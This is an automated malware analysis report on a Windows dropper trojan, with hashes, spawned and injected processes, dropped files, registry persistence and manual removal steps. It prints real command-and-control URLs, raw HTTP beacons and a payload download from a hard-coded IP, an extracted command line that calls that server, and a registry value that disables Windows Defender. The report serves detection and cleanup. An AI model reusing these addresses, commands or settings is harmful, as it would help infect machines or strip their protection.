Dropped.Application.Generic.1683936_cd1f5ed10e
Susp_Dropper (Kaspersky), Dropped:Application.Generic.1683936 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: cd1f5ed10e882f7d8a0c5f967fd45b75
SHA1: 30cb6df0f9178c4738cb37b78bb482c4569c6190
SHA256: 79434ff239e2393796637ffdb9f1087077c54bde8196bd9d162e4a5ea598929c
SSDeep: 3072:GgXdZt9P6D3XJXC/T7eBItOdoewR3kHhhDfrsHXTXQhv:Ge340r7kCOdVwsxfrsHXTAhv
Size: 144917 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Dropped creates the following process(es):
setupok.exe:2868
ddnow.exe:1840
ddnow.exe:4040
ddnow.exe:668
ddnow.exe:3872
ddnow.exe:556
ddnow.exe:3932
ddnow.exe:3272
ddnow.exe:2744
ddnow.exe:2408
%original file name%.exe:3860
tinstall.exe:3728
The Dropped injects its code into the following process(es):
applica.exe:2300
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process setupok.exe:2868 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Program Files%\applica\applica.exe (12 bytes)
%Program Files%\applica\key.ini (0 bytes)
%Program Files%\applica\uninstall.exe (1030 bytes)
The Dropped deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso41C0.tmp (0 bytes)
The process ddnow.exe:1840 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:4040 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (10 bytes)
The process ddnow.exe:668 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:3872 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:556 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe (61 bytes)
The process ddnow.exe:3272 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:2744 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process ddnow.exe:2408 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
The process %original file name%.exe:3860 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst87B6.tmp\SimpleFC.dll (5469 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)
The Dropped deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsz8787.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\34245164.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst87B6.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\icka34245164.txt (0 bytes)
The process tinstall.exe:3728 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)
The Dropped deletes the following file(s):
C:\Windows\System32\Tasks\Adobe Flash Player Updater (0 bytes)
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore (0 bytes)
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA (0 bytes)
Registry activity
The process setupok.exe:2868 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"DisplayName" = "Applica"
"Publisher" = "Dotdo"
[HKLM\SOFTWARE\idot]
"idot" = "ok"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"UninstallString" = "%Program Files%\Applica\uninstall.exe"
To automatically run itself each time Windows is booted, the Dropped adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
The process ddnow.exe:4040 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
The process ddnow.exe:3932 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
The process %original file name%.exe:3860 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"
The process tinstall.exe:3728 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
Dropped PE files
| MD5 | File path |
|---|---|
| b528db49e0768a9591d6ef902b67416a | c:\Program Files\applica\applica.exe |
| fe1e3670cdc51a0ad694683c98a8c22c | c:\Program Files\applica\uninstall.exe |
| d38543fc9ae37d188a23e06ee11d3504 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst87B6.tmp\SimpleFC.dll |
| c5dbd61013cf8146a00f826baee93072 | c:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe |
| a3d027a0f8a46f9adb96ab598d02e494 | c:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe |
| 662c45356fcc64b55f8938e284d0c0d0 | c:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe |
| 113d1d7b8a9039e6e63034284e35cc99 | c:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe |
| 008afd62201f96d10b0b748e2779274d | c:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe |
| 3a808170b41d2c9a4a434632ea4376ab | c:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe |
| 6df14af0f2ce3a7db0b21cc265564a3e | c:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 94208 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 286720 | 2536 | 2560 | 3.13045 | 8c712c343be341f0c008fe547f2adcd2 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 363
URLs
| URL | IP |
|---|---|
| hxxp://162.222.193.23/soid1.php?p=&aaaip=588392 | |
| hxxp://162.222.193.23/goet1.php?p=&pid=&all=&dotnet=yes | |
| hxxp://www.rosalesscholarly.pw/act/ehka.php?w=Windows7Ultimate&a=True&b=;7-Zip;ActiveState;Adobe;ATI Technologies;CBSTEST;Classes;Clients;Ghisler;Google;Intel;JavaSoft;JreMetrics;Macromedia;Microsoft;Mozilla;mozilla.org;MozillaPlugins;ODBC;Perl;Policies;RegisteredApplications;Sonic;ThinPrint;VMware, Inc.;WinPcap;WOW6432Node;Microsoft | |
| hxxp://162.222.193.23/run1.php?a=flash&b=111 | |
| hxxp://162.222.193.23/setup200.exe | |
| hxxp://162.222.193.23/run1.php?a=flash&b=rand | |
| hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61844 | |
| hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61844 - 1 | |
| hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61844 - 1 - ready | |
| hxxp://162.222.193.23/newc4nT.php | |
| teredo.ipv6.microsoft.com | |
| dns.msftncsi.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
POST /run1.php?a=flash&b=111 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
a
HTTP/1.1 200 OK
Date: Tue, 25 Apr 2017 12:43:55 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html.....
GET /act/ehka.php?w=Windows7Ultimate&a=True&b=;7-Zip;ActiveState;Adobe;ATI Technologies;CBSTEST;Classes;Clients;Ghisler;Google;Intel;JavaSoft;JreMetrics;Macromedia;Microsoft;Mozilla;mozilla.org;MozillaPlugins;ODBC;Perl;Policies;RegisteredApplications;Sonic;ThinPrint;VMware, Inc.;WinPcap;WOW6432Node;Microsoft HTTP/1.1
Host: VVV.rosalesscholarly.pw
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 25 Apr 2017 12:43:49 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
OK
HTTP/1.1 200 OK
Date: Tue, 25 Apr 2017 12:44:43 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
POST /run1.php?a=flash&b=setupok.exe - 61844 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
a
HTTP/1.1 200 OK
Date: Tue, 25 Apr 2017 12:44:18 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html.....
POST /run1.php?a=flash&b=rand HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
a
HTTP/1.1 200 OK
Date: Tue, 25 Apr 2017 12:44:04 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html.....
POST /run1.php?a=flash&b=setupok.exe - 61844 - 1 - ready HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
a
HTTP/1.1 200 OK
Date: Tue, 25 Apr 2017 12:44:27 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html.....
POST /run1.php?a=flash&b=setupok.exe - 61844 - 1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
a
HTTP/1.1 200 OK
Date: Tue, 25 Apr 2017 12:44:23 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html.....
POST /setup200.exe HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
;
HTTP/1.1 200 OK
Date: Tue, 25 Apr 2017 12:43:59 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Description: File Transfer
Content-Disposition: attachment; filename=
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 61844
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
POST /soid1.php?p=&aaaip=588392 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
aa
HTTP/1.1 200 OK
Date: Tue, 25 Apr 2017 12:43:49 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 10
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html...1111111..
POST /goet1.php?p=&pid=&all=&dotnet=yes HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 83
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
;hxwnxsh0nxh;0-$fire-ATSpywaregot--L$cgot-c:\cd1f5ed10e882f7d8a0c5f967fd45b75.exe;0
HTTP/1.1 200 OK
Date: Tue, 25 Apr 2017 12:43:49 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
POST /run1.php?a=flash&b=rand HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
a
HTTP/1.1 200 OK
Date: Tue, 25 Apr 2017 12:44:11 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html.....
POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
OK
HTTP/1.1 200 OK
Date: Tue, 25 Apr 2017 12:44:37 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
The Dropped connects to the servers at the following location(s):
.text
`.rdata
@.data
.ndata
.rsrc
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe "hXXp://162.222.193.23/newc4nT.php" "OK" "C:\Users\"%CurrentUserName%"\AppData\Local\icka34245164.txt"
s\"%CurrentUserName%"\AppData\Local\run1.txt"
f7d8a0c5f967fd45b75.exe;0" "34245164.txt"
C:\Users\"%CurrentUserName%"\AppData\Local\icka34245164.txt
SimpleFC.dll
SID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32ers\"%CurrentUserName%"\AppData\Local\Temp\nst87B6.tmp\SimpleFC.dll
KWindows
HNetCfg.FwMgr
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
GetCPInfo
gdi32.dll
AddPort
EnableDisablePort
IsPortAdded
IsPortEnabled
RemovePort
icka34245164.txt
5.ocx
ICKA34~1.TXT
rs\"%CurrentUserName%"\AppData\Local\setupok.exe
d1f5ed10e882f7d8a0c5f967fd45b75.exe
\Windows\system32\Macromed\Flash\Flash32_23_0_0_185.ocx
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Local
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsz8787.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst87B6.tmp
Windows
setupok.exe - 61844 - 1
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>-Operation f
Eigenschaft %s existiert nicht.
OLE-Fehler %.8xBDie Methode '%s' wird vom Automatisierungsobjekt nicht unterst
ge ($0%x)3Komponente mit der Bezeichnung %s existiert bereits/In der Stringliste sind Duplikate nicht erlaubt#Datei %s kann nicht erstellt werden#Datei %s kann nicht ge
ffnet werden(''%s'' ist kein gpft (%d)#Zu viele Eintr
ge in der Liste (%d)*Listenindex
berschreitet das Maximum (%d)BExpandieren des Speicher-Stream wegen Speichermangel nicht m
glich Fehler beim Lesen von %s%s%s: %s
%s.Seek nicht implementiert
r '%s' nicht gefunden&%s kann nicht zu %s zugewiesen werden
Klasse %s nicht gefunden
%s (%s, Zeile %d)
Abstrakter FehlerBZugriffsverletzung bei Adresse %p in Modul '%s'. %s von Adresse %p
Systemfehler. Code: %d.
%s:Ein Aufruf einer Betriebssystemfunktion ist fehlgeschlagen
ltige Variant-Operation#Ung
ltige Variant-Operation ($%.8x)
Variant ist kein ArrayBVariante des Typs (%s) konnte nicht in Typ (%s) konvertiert werdenF
berlauf bei der Konvertierung einer Variante vom Typ (%s) in Typ (%s)
ltiger Variant-Typ Operation wird nicht unterst
Externe Exception %x$Auswertung von assert fehlgeschlagen
ltige Zeigeroperation
ltige Typumwandlung4Zugriffsverletzung bei Adresse %p. %s von Adresse %p
Privilegierte Anweisung(Exception %s in Modul %s bei %p.
Anwendungsfehler7Format '%s' ung
r Format '%s'(Variant-Methodenaufruf nicht unterst
"'%s' ist kein g
ltiger Integerwert"'%s' ist kein g
E/A-Fehler %d
ltige Gleitkommaoperation
lash\Flash32_23_0_0_185.ocx
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
setupok.exe:2868
ddnow.exe:1840
ddnow.exe:4040
ddnow.exe:668
ddnow.exe:3872
ddnow.exe:556
ddnow.exe:3932
ddnow.exe:3272
ddnow.exe:2744
ddnow.exe:2408
%original file name%.exe:3860
tinstall.exe:3728
- Delete the original Dropped file.
- Delete or disinfect the following files created/modified by the Dropped:
%Program Files%\applica\applica.exe (12 bytes)
%Program Files%\applica\key.ini (0 bytes)
%Program Files%\applica\uninstall.exe (1030 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe (61 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst87B6.tmp\SimpleFC.dll (5469 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.